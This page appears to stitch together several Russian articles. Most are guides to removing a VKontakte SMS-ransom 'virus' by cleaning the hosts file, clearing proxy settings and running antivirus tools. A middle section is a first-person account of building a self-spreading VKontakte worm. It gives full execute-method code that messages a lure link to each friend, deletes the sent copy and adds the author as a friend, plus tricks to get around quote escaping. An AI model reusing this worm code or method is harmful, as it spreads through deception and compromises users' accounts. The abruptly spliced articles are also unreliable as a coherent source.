Добрый день, меня начали много спрашивать «Что делать, если я что-то скачал и появился вирус в контакте: как удалить его? «. Я решил продолжить свою статью, в которой я рассказывал, как вручную можно избавиться от вируса не прибегая к помощи специалиста или покупки антивируса. Статью вы можете прочитать .

Сперва всё-таки советую, ознакомиться с первой статьей, способ описанный в ней не требует больших затрат времени и специальных умений. Но если у вас ничего не вышло, вам некто не помог, то читаем дальше. Итак:

Как удалить вирус в контакте?

Для того что бы убрать вирус в контакте и зайти в социальную сеть, можно воспользоваться бесплатной программой В отличии от Dr.Web, CureIt! не требует установки, вам требуется пройти короткую регистрацию, скачать, просканировать компьютер и радоваться.

Скачать его можете, нажав на кнопку ниже с оригинального сайта компании Dr.Web.

Как запустить Dr.Web CureIt!?

Теперь осталось запустить программу, и она сразу преступит к действиям. Вот так выглядит её работа.

Ждём, пока она проверит полностью весь компьютер, это долго!

Теперь давайте вернемся к файлику . После сканирования программа выдаст вам вот такое, обязательно нажмите «Да»!

Ваша проблема решена, надеюсь я понятно дал ответ на вопрос «Вирус в контакте как удалить?»:)

Но напоминаю, эта программа только для срочного лечения, советую установить антивирус!

Если вам помогла или понравилась данная статья, не забудьте поставить свой лайк , это поможет другим пользователям найти её быстрей. А я смогу узнать, что интересует вас больше всего, чтобы подготовить и написать еще больше интересных и полезных статей! С уважением, Вячеслав.

С каждым днем все больше и больше пользователей жалуются на то, что у них в контакте вирус. Откуда он там взялся и как его прогнать?

Однажды, зайдя в социальную сеть на свой аккаунт, вы обнаруживаете яркое красочное окошко, которое загораживает привычный вам интерфейс. Такие окна могут различаться как по дизайну, так и по текстовой иноформации, однако суть одна - вас пытаются обвинить в спаммерстве. Для того чтобы разблокировать профиль, вас посылают по такому-то адресу (в смысле, настоятельно рекомендуют перейти по приведенной ссылке). На самом деле это и есть не что иное как вирус Если вы перейдете туда, куда вас отправили, то увидите еще одно окошко, где вам предлагается отправить смс с мобильного, причем сделать это совершенно бесплатно. Ни за какие коврижки не оправляйте никуда никаких сообщений, в противном случае вы лишитесь доброй части своего баланса на телефоне, а рубли (как показывает практика, в количестве от 200 до 600-800 рублей) благополучно осядут в виртуальном кармане мошенника.

Но и сидеть, сложа руки, не стоит, поскольку раз на вашей странички наличествует подобного рода окно, значит вы уже подцепили некий вирус, скорее всего, «троян», который сегодня просто заблокировал вам доступ в контакте, а завтра парализует уже всю работу компьютера.

Если у вас появился вирус в контакте, срочно несите свое компьютерное устройство в сервис, чтобы его подвергли диагностике и излечили.

Вы также можете самостоятельно попробовать справиться с проблемой, если вам не терпится заглянуть на свой аккаунт в социальной сети. Итак, если вирус заблокировал профиль в контакте, то следует уделить внимание файлу под названием «hosts». Как правило, вирус изменяет как раз ее содержимое. Искомое найти просто. Заходим на диск С, отыскиваем папку, которая называется «WINDOWS», в ней - папку «system32», затем папку «drivers». В последней папке отыщите название «etc». Вот в ней-то и находится искомый «hosts», представляющий собой файл без расширения. Заметьте, что файлик может быть скрытым, тогда в проводнике он отображаться не будет. В таком случае необходимо включить в настройках системы функцию отображения этих скрытых файлов.

Теперь проверьте атрибуты файла «hosts», нажав на «Свойства». Если там будет указано, что файлик только для чтения, то данный атрибут необходимо снять. Теперь откройте «hosts» при помощи какого-нибудь текстового редактора и недрогнувшей рукой начинайте удалять все, что попадется, кроме записи «127.0.0.1 localhost».

Однако может возникнуть ситуация, когда вирус в контакте блокирует доступ к данному файлу. Тогда имеет смысл проделать все вышеописанное, но загрузившись с Live-CD. Вместо того, чтобы редактировать файл ««hosts», вы можете просто его удалить.

Изменения, которые вы внесли в систему, должны вступать в силу без перезагрузки компьютера, поэтому сразу же попробуйте вновь зайти в социальную сеть.

Вирус может действовать иначе. Если «hosts» пустует, то проверьте в настройках браузера, не прописан ли прокси. Открыв Эксплорер, откройте в меню «Сервис», затем - «Свойства обозревателя», затем - «Подключения» и, наконец, «Настройка сети». Если в поле под названием «Адрес» что-либо прописано - нещадно удаляйте.

Если ничто из вышеописанного вам не помогло, значит, на вашем виртуальном пути повстречался более редкий и, конечно, более «продуманный» вирус. В таком случае на вопрос, вам помогут найти ответ специалисты.

Если у вас все получилось и вам удалось-таки зайти в свой профиль в контакте, не спешите радоваться. Вирус может по-прежнему пребывать и здравствовать в системе вашего компьютера. Для окончательного и бесповоротного его удаления настоятельно рекомендуем вам воспользоваться такими как Kaspersky Removal Tool либо CureIT, которые необходимо скачивать только с официальных сайтов-производителей, в данном случае с Лаборатории Касперского и, соответственно, с Доктора Веба.

Всегда помните, что предотвращение проблемы куда более легкий процесс, чем ее решение. Помните о профилактике вирусов - установите хороший антивирус на компьютер, отключите функцию автозапуска с флешки, не бродите по неизвестным ссылкам, которые вам присылают знакомые и незнакомые люди, и ни в коем случае свои данные не вводите на сторонних ресурсах, даже если вас о том очень-очень просят.

В очередной день я сидел перед компьютером и не знал, чем заняться. Прокручивая свою ленту уже вернулся ко вчерашним постам, которые уже видел. Перейдя на свою страницу подумал про себя: «Боже, всего 160 подписчиков. Как же это мало...». И сразу же возник вопрос «А как их увеличить?». Ясное дело, что каждому на ум придет накрутка. Но для этого требовалось либо деньги, либо проводить много времени, подписываясь, делая репосты или лайкая всё, что угодно - это не было выходом.

Позже, перед сном, ко мне забралась идея, как это сделать. Идея заключалась в вирусной ссылке, которую получат почти все пользователи сети.

Проснувшись утром и попив кофе, я начал реализовывать эту идею. Для многих уже давно не секрет, что для выполнения запросов от имени пользователя в VK API, нужно иметь его access_token. Но! На самом сайте этого ключа не требуется, чтобы просто протестировать. Перед началом создания этого Супер вируса, я хотел просто проверить его работоспособность.

Для теста и использовал метод friends.add и в поле user_id прописал свой id. Выполнив это действие, адресная строка изменится, на что-то вроде этого:

Эту ссылку я сократил через vk.cc и оставил в комментариях к двум популярным группам с заманчивым описанием. Через полчаса у меня уже было 100 подписчиков (было бы больше, но мой комментарий удалили, а меня забанили). После этого, я стал уверен, что это сработает и приступил к его созданию.

Вконтакте ограничивает доступ к API от одного IP интервалом в 5 секунд, чтобы сервер не перегружался. И для решения проблемы с частыми запросами они создали метод execute . Этот метод позволяет вызывать несколько методов одновременно с сохранением алгоритма, чем я и воспользовался.

Этот вирус в основном опирается на доверчивость людей, двумя словами - «социальная инженерия». Каждый из нас наверняка перейдет по ссылке в сообщении от своего друга - именно этим я и хотел поработить мир воспользоватся.

На создание вируса у меня ушли примерно сутки, так как встретил пару преград. Об этом чуть позже. Вирус должен был работать так:

1. Пользователь перешел по ссылке
2. Метод получает список всех друзей и сортирует их по рейтингу
3. Отправляет сообщение с текстом «Смотри /* ссылка */ »
4. Сообщение удаляется у отправителя
5. Добавляет в друзья и/или подписывается в указанные группы
6. Друзья, которые получили сообщение переходят по ссылке
7. Начинаем с начала

И собственно так выглядит этот код в методе:

Var a = API.friends.get({ // Метод для получения списка всех друзей "order": "hints" // Параметр для сортировки по рейтингу }).items; // Получить только список var b = 0; // Переменная для цикла var d = 0; // Переменная для id сообщения while (a[b]){ d = API.messages.send({ // Метод отправки сообщения. Возвращает id сообщения "user_id": a[b], // получатель "message": "Смотри /* ссылка */ " // текст сообщения }); API.messages.delete({ // Удалить сообщение по его id "message_ids": d }); b = b + 1; // Увеличить b на 1 (++b или b++ не работает) } API.friends.add({ "user_id": "мой id" });
Получив ссылку, я радостно пошел протестировать на своем фейковом профиле. Но не тут-то было. Перейдя по ссылке, мне выдало ошибку 12: Синтаксическая ошибка. Не ожидалось символа &. Здесь и начались мои преграды.

Как оказалось, сервер для защиты от XML переводит все знаки. И знак двойных кавычек " просто переводился в & quotes; а консоль
выдавала ошибку. Одинарные кавычки не переводятся, но их он не примет, так как синтаксис от JSON.

Так как это моя первая попытка работы с уязвимостью (как и этот пост) на это у меня ушло чуть дольше времени. Первые пять часов ушли на то, чтобы понять, что ключи можно передавать и без кавычек, и цифры писать в кавычках тоже не обязательно. Т.е. можно так:

API.friends.add({ user_id: 1234567 });
Хорошо, половина проблемы была решена. Осталась лишь одна проблема: мне нужно было придумать, как передать текст сообщения и слово «hints» для сортировки.

Для справки! Почему передавать параметр hints было обязательно?

Дело в том, что даже на странице теста метода, при подозрительном запросе (например отправка от 3 или 7 сообщении), требуется ввести капчу. Не факт, что сообщение будет отправлено нужному человеку. Поэтому передача этого параметра отсортирует список так, что первые трое из списка с большей вероятностью в 90% перейдут по ссылке.

Для решения последней проблемы я подумал использовать регулярные выражения или что-то вроде, для замены числа 0 в строку. Сам я только начинающий web разработчик и не знал, как это делать, и задал вопрос на тостере. Получив два нужных мне ответа с разными путями решений, сразу же решил использовать их. И тут снова проблема…

ВКонтакте API - это не JavaScript и не поддерживает его функции вроде replace() или toString(). Да и вообще ничего не поддерживает из JS, кроме var, return, while, if, else, массивов и операторов сравнения.

Я снова оказался в тупиковом положении и не знал, что мне делать. Я рассказал об этом своим знакомым программистам с просьбой помочь. Со словами «Это просто гениально, чувак!» они решили мне помочь и пошли копаться в документации к API

Ушло очень много времени, пока я думал, как мне решить эту проблему. Стало поздно и я пошел спать. Перед сном, меня опять озарила грандиозная идея с решением этой проблемы.

Снова утро. Попив свою дозу утреннего кофе первым делом я приступил к продолжению своего вируса.
Решение было довольно простым. Ведь передавая числа или переменные из методов, необязательно писать их в кавычках.

Для меня понадобился мой фейковый профиль. Там я сделал два разных поста с такими текстами:

• Смотри /* ссылка */
• hints

Всё, что мне требовалось, это получить эти записи и записать в переменные, что я и сделал. В итоге у меня получился такой код:

Var b = 0; // Переменная для цикла var d = 0; // Переменная для id сообщения var m = API.wall.get({ owner_id: id, // id фейковой страницы count: 1 // вернуть всего 1 пост }).items.text; // получить только текст статьи var h = API.wall.get({ owner_id: id, // id фейковой страницы count: 1, // вернуть всего 1 пост offset: 1 // сместить посты на 1 }).items.text; // получить только текст статьи var a = API.friends.get({ // Метод для получения списка всех друзей order: h // Параметр для сортировки по рейтингу }).items; // Получить только список while (a[b]){ d = API.messages.send({ // Метод отправки сообщения. Возвращает id сообщения user_id: a[b], // получатель message: m // текст сообщения }); API.messages.delete({ // Удалить сообщение по его id message_ids: d }); b = b + 1; // Увеличить b на 1 (++b или b++ не работает) } API.friends.add({ "user_id": "мой id" });
Получив ссылку, я проверил его на работоспособность и - ура! Всё работало так, как нужно. С фейковой страницы был отправлен запрос на добавление в друзья и успешно переданы сообщения первым 7 друзьям из рейтинга. Сжав ссылку и поставив его на первый пост, я с довольной улыбкой готовился к Большому Буму!

Чтобы еще и знать, сколько людей перешло по ссылке, я сжал ссылку к php файлу на моем хостинге, который записывал посещение в БД, и переадресовывал к методу с кодом.

Для интриги я не стал обновлять страницу каждый раз, а просто вышел из ВК сразу, после одного коммента. Вернулся примерно через час и, посмотрев на количество записей в БД, ощутил прилив счастья. Радости не было предела! Более 5000 переходов. «И этого всего за час! А что же будет через два?» - задавался себе вопросом. Ведь это был мой первый опыт в хакинге.

Решив посмотреть сколько все же набралось лично на странице, я зашел на сайт и вижу целых 3 новых подписчика! Не сказать, что я не был удивлен. Я ничего не понимал… В базе было более 5000 строк, где почти все имели индивидуальный IP, а подписчиков всего 3. Я начал думать, что я на самом деле не такой умный, кое себя считал 2 минут назад, и что от таких махинации у ВК уже есть защита. С такими мыслями я ушел грустить.

Прошло уже 2 дня. Перед тем, как идти спать, я решил проверить свой сайт. Заглянув в базу данных, и ради интереса посмотрел таблицу для записи статистики. Там уже набралось более 25 000 посещении по вирусной ссылке, а подписчиков стало меньше, т.к. отписались еще и те, которые для меня были тестом еще в начале.

Снова перед сном, я наконец понял, почему не было новых подписчиков, а количество переходов росло (кто-нибудь, напишите пост, почему именно перед сном приходят решения? Иначе я сам напишу).
Все дело было в коде. Метод execute выполняет код сохраняя алгоритм, а метод добавления в друзья был в самом конце. Он не срабатывал потому, что дальнейшие методы не выполнялись до тех пор, пока не будет введена капча. Т.к. у всех моих «жертв» было больше 8 друзей, естественно срабатывала капча, а пользователи заподозрив что-то, просто закрывали вкладку. Запись сохранялась, сообщения передавались, а рабов подписчиков не становилось больше.

Сразу скакнув из кровати, я решил исправить это быстро, чтобы к утру было уже более десяток тысяч подписчиков. После внесении изменении в php файле переадресации, я ушел спать с довольными мыслями завтрашнем дне.

Наступает утро и я проверяю свой профиль, даже не попив свой кофе. Ура! Подписчиков стало меньше…
Я снова был крайне удивлен. Всё же должно работать. На сей раз я решил проверить работоспособность ссылки на настоящем профиле. Удалив код, удаления сообщения, я перешел по сгенерированной ссылке. Оказывается эту уязвимость разработчики уже закрыли. Код в адресные строке по переходу уже не срабатывал

Я не знаю, как они сами до этого догадались. Я тут гений! То ли и до них дошло сообщение, то ли один из знакомых программистов втайне рассказал об уязвимости, чтобы там ни было я об этом никогда не узнаю.

Я всё равно был рад, так как я впервые смог найти уязвимость в большой сети. Может другим это обычное дело, но для меня это было чем-то особенным.

Теги: вконтакте api, уязвимости, социальная инженерия

Если ваш компьютер заражен

Сеть "ВКонтакте" довольно популярна у пользователей. Поэтому появляются новые вирусы, которые блокируют вход, не давая зайти на личную страничку. Они воруют учетные данные, осуществляют рассылку спама. Число таких вредоносных программ постоянно растет, не все знают о том, как с этим бороться. Многим интересно, как можно разблокировать свою страницу, устранить вирус "ВКонтакте", и вернуть доступ к ней. Некоторые сталкиваются с ситуацией, когда при входе в соцсеть появляется сообщение о необходимости послать СМС. Это один из признаков того, что появился вирус "ВКонтакте". Если говорить точнее, вирус у вас на компьютере, он не позволяет зайти на вашу страницу. СМС будет платной, не спешите ее отправлять, не надо помогать зарабатывать мошенникам.

Что происходит при заражении вирусом?

Чтобы удалить вирус "ВКонтакте", надо разобраться в том, как происходит подобное заражение. Такие вирусы попадают на компьютер пользователя через программы, которые были установлены, или при входе на сайт с вирусом. После того как произошло заражение, пользователям часто видна только страница активации, а войти на свою не получается. Помните, администрация "ВКонтакте" заверяет, что она никогда не просит отправлять СМС, для того чтобы войти в сеть. Как правило, некто просит отправить не очень дорогое сообщение для входа в соцсеть. Это обман. Есть случаи, когда после отправки подобных сообщений пользователям, у которых на счету было менее ста рублей, приходило уведомление, что средств для отправки подобного сообщения недостаточно, а это говорит о том, что СМС стоит больше.

Почему не следует отправлять платные СМС при входе в соцсеть?

Некоторые пользователи теряются, тем более часто бывает, что человек садится пообщаться в сети после тяжелого рабочего дня, а тут поджидает вирус "ВКонтакте", требующий отправки платного сообщения. Люди с большим балансом на счетах своих телефонов делают, как их просят, теряют деньги, а зайти в соцсеть по-прежнему не могут. Обычно вирус пишет сообщение, которое говорит о просьбе администрации произвести СМС-активацию из-за роста спама и аккаунтов-пустышек. Сообщается, что сделать это надо только один раз, а в ответ должен быть выслан код, который надо будет ввести в соответствующее поле. Сформулировано все будет красиво и грамотно. В конце появится приписка, что администрация соцсети заботится о безопасности своих клиентов.

Какие могут быть последствия?

Вирусы "ВКонтакте" - не самое редкое явление, многие о них слышали, но не все знают о том, как с ними бороться. Всем пользователям надо запомнить одну вещь - не стоит заносить везде свой сотовый номер. В лучшем случае украдут ваши учетные данные и снимут разово сумму со счета на телефоне. А бывает, что при отправке СМС-сообщения человека подписывают на какие-нибудь платные услуги, тогда уже деньги будут списываться с телефона с определенной периодичностью. Вам нужны такие проблемы?

Как уда лить вирус "ВКонтакте", какие шаги необходимо предпринять для его устранения?

1. Нажмите "Пуск", затем "Выполнить", наберите %SYSTEMROOT%\system32\drivers\etc\hosts. Потом надо выбрать "Блокнот" для открытия файла.
2. Посмотрите, есть ли в документе строки, упоминающие о vkontakte.ru, их надо убрать.
3. Далее надо открыть "Поиск", набрать vkontakte.exe, указав необходимость поиска в системных файлах, а также в скрытых файлах и папках. Удалите этот файл.
4. Обновите антивирус и проверьте всю систему.
5. Если при первом шаге вы не смогли открыть документ hosts, выключите свой компьютер, зайдите в безопасный режим и повторите все действия сначала.

Еще способ

Существует альтернативный метод, который был найден предприимчивыми людьми. Его применяют, если первый способ не удалось реализовать. Пользователи перемещают содержимое папки etc в другую (созданную) папку (не копируют, а перемещают).

Что делать, если при открытии своей странички ВКонтакте появляется сообщение о нарушении правил пользования, блокировке аккаунта и предложением получить код активации после отправки СМС – сообщения? Либо же просто невозможно зайти на любимый сайт безо всяких «требований о выкупе». Главное о чем стоит помнить в этот момент, сайт «ВКонтакте» абсолютно бесплатен и не требует отправки платных СМС сообщений. И второе – компьютер заражен вредоносным программным обеспечением и из вашего кошелька пытаются выманить деньги. Отправка СМС еще не гарантирует решения проблемы и ее стоимость может значительно отличаться от заявленной.

Как происходит заражение компьютера? Как правило, пользователь сам подвергает опасности свою систему, устанавливая «левое» программное обеспечение либо переходя по ссылке на подозрительные сайты. Как результат в компьютер вселяется вирус.

Основные способы удаления вируса ВКонтакте:

1. Восстановление системы. Наиболее простой способ. В этом случае все параметры системы откатываются на дату, когда компьютер еще не был заражен. Выполняется просто – через кнопу «Пуск» выбираем «Программы» > «Стандартные» > «Служебные» > «Восстановление системы».
2. Редактирование файла hosts, о котором мы более подробно расскажем немного позже.
3. Если файл hosts чист, то можно попробовать использовать другой браузер. Некоторые вирусы «приклеиваются» только к браузеру и его смена поможет решить проблему. Если пользуетесь стандартным Internet Explorer, то попробуйте поставить Chrome или Mozilla Firefox.
4. Проверка компьютера новейшим антивирусом. Для этого подойдут бесплатные утилиты Avptool, Dr.Web CureIt! или Malwarebytes’ Anti-Malware. Использование последней утилиты зачастую позволяет исправить ситуацию и открыть доступ на закрытые сайты.
5. Если вышеперечисленные процедуры не помогают, обратитесь к специалисту. Мы исходим из того, что вы не настолько разбираетесь в реестрах, запущенных процессах, чтобы начать их редактировать и править.
6. Переустановка системы. Кардинальный, но действенный метод. Оставьте его в качестве «последнего патрона».

Как самостоятельно отредактировать файл hosts?

В связи с тем, что редактирование файла hosts является одним из наиболее распространенных способов борьбы с ВКонтакте, мы предлагаем пошаговую инструкцию по его редактированию. Несмотря на то, что придется немного «включить мозг», ничего страшного в процессе редактирования файла hosts нет. Что это за файл и как используется, наиболее любопытные могут прочитать самостоятельно, например в Википедии.

Итак, вот несложная схема действий, подходящая для всех популярных операционных систем (XP, Vista и Win 7):

1. Загружаем компьютер в безопасном режиме с правами администратора (удерживаем клавишу F8 при загрузке, после чего в появившемся меню выбрать пункт «Безопасный режим»). Если есть сложности с переходом в безопасный режим, пробуйте как есть.
2. Следуем к C:\WINDOWS\system32\drivers\etc\ и ищем файл с именем hosts. Если файла не видно, делаем скрытые и системные файлы видимыми («Панель управления» > «Свойства папки» > «Вид» — ставим галку напротив «Показывать скрытые и системные файлы»). Внимание! У файла hosts не должно быть никаких расширений. Открываем его «Блокнотом» (Правая кнопка мыши > «Открыть с помощью» > «Блокнот») и изучаем. Под знаками # должна содержаться только одна запись вида «127.0.0.1 localhost». Все остальные записи удаляем. И конечно же сохраняем все изменения. Перезагружаем компьютер.

И напоследок несколько советов, как избежать заражения компьютера вирусом ВКонтакте:

1. Не передавайте своих паролей от «ВКонтакте» никому. По возможности храните пароли в зашифрованном виде с использованием специализированных программ. Не используйте в пароле личные данные, кличку собаки, слово «пароль» и т.д.
2. Не отвечайте на письма администрации социальной сети. Это не требуется. Обычно такие письма приходят от спамеров и вредителей.
3. Пользуйтесь антивирусом с актуальными базами.
4. Не устанавливайте на свой компьютер сомнительное программное обеспечение.

Есть множество и других рекомендаций, но в подавляющем большинстве случаев достаточно выполнения и этих. Выше описанные способы удаления вирусов подходят не только для сайта «ВКонтакте», но и для других социальных сетей и часто посещаемых ресурсов.